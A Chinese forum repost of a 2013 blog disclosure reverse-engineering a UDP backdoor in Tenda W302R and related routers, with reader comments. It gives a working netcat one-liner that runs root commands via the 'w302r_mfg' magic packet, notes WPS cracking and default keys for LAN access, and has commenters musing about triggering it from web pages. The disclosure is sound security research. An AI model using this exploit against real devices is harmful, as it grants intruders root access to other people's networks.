同一个网站爆的,只需发送一个udp包,围观地址:
http://www.devttys0.com/2013/10/from-china-with-love/
poc
$ echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329 drwxr-xr-x 2 0 0 1363 webroot drwxr-xr-x 1 0 0 0 var drwxr-xr-x 5 0 0 43 usr drwxr-xr-x 1 0 0 0 tmp drwxr-xr-x 2 0 0 3 sys drwxr-xr-x 2 0 0 569 sbin dr-xr-xr-x 39 0 0 0 proc drwxr-xr-x 2 0 0 3 mnt drwxr-xr-x 1 0 0 0 media drwxr-xr-x 4 0 0 821 lib lrwxrwxrwx 1 0 0 11 init -> bin/busybox drwxr-xr-x 2 0 0 3 home drwxr-xr-x 7 0 0 154 etc_ro drwxr-xr-x 1 0 0 0 etc drwxr-xr-x 1 0 0 0 dev drwxr-xr-x 2 1000 100 574 bin
博客里面提到的路由器Tenda’s W302R , Tenda W330R, Medialink MWN-WAPR150N.
From China,With Love!
Lest anyone think that D-Link is the only vendor who puts backdoors in their products, here’s one that can be exploited with a single UDP packet, courtesy of Tenda.
After extracting the latest firmware for Tenda’s W302R wireless router, I started looking at /bin/httpd, which turned out to be the GoAhead webserver:
Server header string in /bin/httpd
But Tenda has made a lot of special modifications themselves. Just before entering the HTTP receive loop, main calls InitMfgTask, which spawns the MfgThread function as a separate thread:
pthread_create(&var_10, 0, MfgThread, 0);
Hmmm…InitMfgTask and MfgThread? Related to manufacturing tasks perhaps? Iiiiiinteresting…
The first thing MfgThread does is create a UDP socket and bind it to port 7329:
Create UDP socket and bind to port 7329
The thread then goes into a recvfrom loop, reading up to 128 bytes from the socket. It expects each received UDP packet to be at least 14 bytes in length:
Read packet from socket and check packet size
Now for the fun part; the received UDP packet is then parsed by this block of code:
Processing the received packet
In C, this code reads:
memset(rx_magic_string, 0, 0x80); memset(command_byte, 0, 0x80); memset(command_arg, 0, 0x80); memcpy(rx_magic_string, rx_buf, 9); command_byte[0] = rx_buf[11]; memcpy(command_arg, rx_buf+12, rx_size-12); // If magic string doesn't match, stop processing this packet and wait for another packet if(strcmp(rx_magic_string, "w302r_mfg") != 0) goto outer_receive_loop;
We can see that the thread is expecting a packet with the following structure:
struct command_packet_t
{
char magic[10]; // 9 byte magic string ("w302r_mfg"), plus a NULL terminating byte
char command_byte;
char command_arg[117];
};
As long as the received packet starts with the string “w302r_mfg”, the code then compares the specified command byte against three ASCII characters (’1′, ‘x’, and ‘e’):
Comparing command_byte to ’1′, ‘x’ and ‘e’
For simplicity, I’ve converted the remaining disassembly (at least the important bits) to the following C code:
switch(command_byte)
{
case 'e':
strcpy(tx_buf, "w302r_mfg");
tx_size = 9;
break;
case '1':
if(strstr(command_arg, "iwpriv") != NULL)
tx_size = call_shell(command_arg, tx_buf, 0x800);
else
strcpy(tx_buf, "000000");
tx_size = strlen(tx_buf);
break;
case 'x':
tx_size = call_shell(command_arg, tx_buf, 0x800);
break;
default:
goto outer_receive_loop;
}
sendto(client_socket, tx_buf, tx_size, client_sock_addr, 16);
goto outer_receive_loop;
The following actions correspond to the three accepted command bytes:
- ‘e’ – Responds with a pre-defined string, basically a ping test
- ’1′ – Intended to allow you to run iwpriv commands
- ‘x’ – Allows you to run any command, as root
If ‘x’ is specified as the command byte, the remainder of the packet after the command byte (called command_arg in the above code) is passed to call_shell, which executes the command via popen:
popen(command_arg, “r”);
What’s more, call_shell populates the tx_buf buffer with the output from the command, which, as we can see from the previous C code, is sent back to the client!
Knowing the functionality of MfgThread and its expected packet structure, we can easily exercise this backdoor with netcat:
$ echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329 drwxr-xr-x 2 0 0 1363 webroot drwxr-xr-x 1 0 0 0 var drwxr-xr-x 5 0 0 43 usr drwxr-xr-x 1 0 0 0 tmp drwxr-xr-x 2 0 0 3 sys drwxr-xr-x 2 0 0 569 sbin dr-xr-xr-x 39 0 0 0 proc drwxr-xr-x 2 0 0 3 mnt drwxr-xr-x 1 0 0 0 media drwxr-xr-x 4 0 0 821 lib lrwxrwxrwx 1 0 0 11 init -> bin/busybox drwxr-xr-x 2 0 0 3 home drwxr-xr-x 7 0 0 154 etc_ro drwxr-xr-x 1 0 0 0 etc drwxr-xr-x 1 0 0 0 dev drwxr-xr-x 2 1000 100 574 bin
One teensy-weensy, but ever so crucial little tiny detail is that the backdoor only listens on the LAN, thus it is not exploitable from the WAN. However, it is exploitable over the wireless network, which has WPS enabled by default with no brute force rate limiting. My shiny new ReaverPro box made relatively short work of cracking WPS, providing access to the WLAN and a subsequent root shell on the router (they also ship with a default WPA key, which you might want to try first):
ReaverPro cracking the WPS pin
Starting telnetd and getting a root shell
As the magic string suggests, this backdoor was likely first implemented in Tenda’s W302R router, although it also exists in the Tenda W330R, as well as re-branded models, such as the Medialink MWN-WAPR150N. They all use the same “w302r_mfg” magic packet string.
UPDATE:
ea did a great job of grepping through various Tenda firmwares to find a lot more routers that are likely affected: http://ea.github.io/blog/2013/10/18/tenda-backdoor/
原文讨论:
virusdefender says:
October 18, 2013 at 2:35 am
it’s mysterious…
monky says:
October 18, 2013 at 2:45 am
Chinese device has backdoor in router. wow… amazing!!!!
Pingback: Tenda路由器后门? | USA is China
cong ty luat says:
October 18, 2013 at 6:16 am
from china with love. :V
Preston says:
October 18, 2013 at 6:31 am
Some how, the source of this GoAhead was on github:
https://github.com/socoola/yhrouter/blob/master/user/goahead/src/goahead.c
Github record shows the repo was commited to github a year ago. It shows very clear how the backdoor “MfgThread” works.
I’ve no idea where the source comes from, maybe leaked from a engineer? I guess Tenda doesn’t intent to opensource their firmware.
Craig says:
October 18, 2013 at 12:20 pm
Yeah, I saw that too (after I RE’d the firmware of course ). It’s common for vendors to not release the source to any of their custom/customized binaries, even if they have a GPL release; it isn’t clear why the code got uploaded to github though.
Jobs says:
October 18, 2013 at 7:28 am
WHAT THE CHINE ROUTERS !!!
I’m using f*** tenda wireless accesspoint…
Craig says:
October 18, 2013 at 12:21 pm
Well the good news is that the backdoor only listens on the LAN, so as long as you don’t have any untrusted users on your network and you disable WPS and use a strong WPA passphrase, you should be relatively safe.
Chinese Guy says:
October 18, 2013 at 7:40 pm
Are you telling me they will go near your house, check if your WPS is on, and sit there for several hours to crack the password just to spy on your unencrypted connections? Scaring your ISP to hand over your data is definitely more effective. This kind of obvious backdoor is more like the work of a newbie programmer who is cheap to hire, and wanted to test the firmware but forgot to remove it when releasing the firmware.
Craig says:
October 18, 2013 at 7:59 pm
I doubt this was a forgotten backdoor (though almost certainly the developers of these devices are newbies/cheap hires). Based on the function names alone this appears to be put in place intentionally for testing/debugging during manufacturing.
ea says:
October 18, 2013 at 8:34 am
Nice find, I grepped trough the different firmwares on tenda website : http://ea.github.io/blog/2013/10/18/tenda-backdoor/
Craig says:
October 18, 2013 at 12:18 pm
Awesome work! I updated the post to include this link.
Veronique says:
October 18, 2013 at 9:18 am
F** China device !
Pingback: Kolejna tylna furtka w ruterach – wystarczy magiczny pakiet UDP | Zaufana Trzecia Strona
Benny says:
October 18, 2013 at 10:58 am
Great work, congratulations to your success!
Pingback: NeoAtlantis/NERV | 【转载】腾达路由器后门导致root权限访问
Jack says:
October 19, 2013 at 5:31 am
Well, We should boycott chinese devices immediately!
相关内容:
Reverse Engineering a D-Link Backdoor
全面披露华硕十款无线路由器 - AiCloud启用单位的多个漏洞
为防止第三方从路由器窃取数据,Facebook 将采用高等级加密
美国政府入侵中国网络多年,透过入侵巨型路由器,一举入侵成千上万电脑
TP-LINK 路由器后门,TPLINK 存在一个 Shell 调试后门
发一些 Cisco(思科) 路由器和交换机的IP、账号、密码
相关吐槽:
1#
灬相随灬 (大胆天下去得,小心寸步难行。) | 2013-10-18 09:37
0.0
2#
纷纭 | 2013-10-18 09:57
家里是这个
3#
xsser (十根阳具有长短!!) | 2013-10-18 10:11
草
4#
请叫我大神 | 2013-10-18 10:11
7329是listen在哪个IP的?
5#
xsjswt | 2013-10-18 10:12
@xsser 不错
6#
wefgod (求大牛指点) | 2013-10-18 10:16
@xsser 草
7#
xsjswt | 2013-10-18 10:19
@xsjswt 看分析和测试过程,是绑的内网IP
8#
xsjswt | 2013-10-18 10:20
@请叫我大神 看分析和测试过程,是绑的内网IP
9#
蟋蟀哥哥 (popok是孙子!![just for fun]) | 2013-10-18 10:25
ca 牛逼了
10#
clozure | 2013-10-18 10:30
吊炸天
11#
请叫我大神 | 2013-10-18 10:34
@xsjswt Tenda 我记得不是第一次了吧,上次那个WPS PIN码问题,貌似也有它
12#
xsjswt | 2013-10-18 11:11
@请叫我大神 球袋发财
13#
xsjswt | 2013-10-18 11:11
@clozure tcpper 撸炸天
14#
Ivan | 2013-10-18 13:26
回去搞一下
15#
xsser (十根阳具有长短!!) | 2013-10-18 13:30
怎么在网页里直接进行攻击呢?
16#
xsjswt | 2013-10-18 16:08
@xsser 今天想了很久,最后只有java
17#
xsjswt | 2013-10-18 16:08
@xsser 据说下一代flash能支持udp
18#
cnrstar (Be My Personal Best!) | 2013-10-18 16:11
@xsjswt 吊!
19#
暴暴 | 2013-10-18 16:14
屌炸天,,可是这东西官方留下的目的是啥,可以产生什么利益?
20#
Hxai11 (http://www.itkuo.cn) | 2013-10-18 16:40
真是叼炸天,官方留的?
21#
ppt (http://t.cn/7V3QH#duan_wang_zhi_ni_ye_gan_dian?|nuf rof gnikcah|) | 2013-10-18 19:52
@xsjswt @xsser 据说chrome app 能够发udp包,链接 http://developer.chrome.com/apps/app_network.html#udp
22#
xsser (十根阳具有长短!!) | 2013-10-18 20:49
@ppt 那也不能让普通用户装app啊
23#
also (白帽子) | 2013-10-18 22:02
@请叫我大神 是路由的ip